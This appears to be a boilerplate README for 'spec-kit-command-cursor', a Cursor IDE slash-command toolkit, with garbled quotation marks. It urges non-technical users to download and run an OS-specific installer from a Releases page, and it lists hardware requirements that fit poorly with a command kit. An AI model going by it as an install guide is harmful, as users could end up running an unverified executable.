Welcome to the "spec-kit-command-cursor"! This toolkit helps you use the Cursor IDE to turn your ideas into structured specifications, plans, and actionable tasks with ease. It is designed for anyone who wants to organize their workflow better, even if you donβt have a tech background. Letβs dive in!
To get started, you need to download the latest version of the toolkit. Simply visit this page to download: spec-kit-command-cursor Releases.
Follow these steps:
- Click on the link above to go to the Releases page.
- Look for the latest version at the top of the list.
- Download the file that matches your operating system.
- Open the downloaded file and follow the installation prompts.
Thatβs it! Youβre ready to start using the toolkit.
Here are some key features of the spec-kit-command-cursor:
- Idea Specification: Easily write down your ideas and structure them into specifications.
- Planning Tools: Use built-in templates to create detailed plans for your projects.
- Task Management: Break down complex ideas into actionable tasks you can track and complete.
- User-Friendly Interface: Navigate effortlessly with an intuitive layout designed for ease of use.
Before installing, make sure your computer meets these requirements:
- Operating System: Windows 10 or later, macOS Sierra or later, Ubuntu 18.04 or later.
- Processor: Minimum Intel i3 or equivalent.
- RAM: At least 4 GB; 8 GB recommended.
- Storage: 100 MB of free space for installation.
Ensure your system is up to date for the best experience.
Once you have installed the toolkit, itβs time to start using it:
- Open the Cursor IDE: Launch the software from your desktop or applications menu.
- Create a New Project: Go to the βFileβ menu and select βNew Projectβ.
- Use Commands: Enter commands like
/specify
,/plan
, or/tasks
in the command bar to get started. - Follow Prompts: The toolkit will guide you as you fill in necessary details.
This straightforward process lets you focus more on your ideas and less on managing them.
If you have questions or need help, we offer various support options:
- Documentation: Check our detailed documentation for more information on features and commands.
- Community Forum: Join our community forum to chat with other users, share ideas, and get advice.
- Issue Tracker: Report any bugs or issues you encounter directly on our GitHub page.
Want to help improve the toolkit? We welcome contributions from everyone:
- Fork the Repository: Start by creating your own copy of the repository.
- Make Changes: Update the toolkit or documentation as needed.
- Submit a Pull Request: Share your changes with the community by submitting a pull request.
Thanks to all contributors who have helped make the spec-kit-command-cursor a great tool! Your work is appreciated and instrumental in helping others streamline their workflows.
For more information and updates, donβt forget to check the spec-kit-command-cursor Releases page regularly.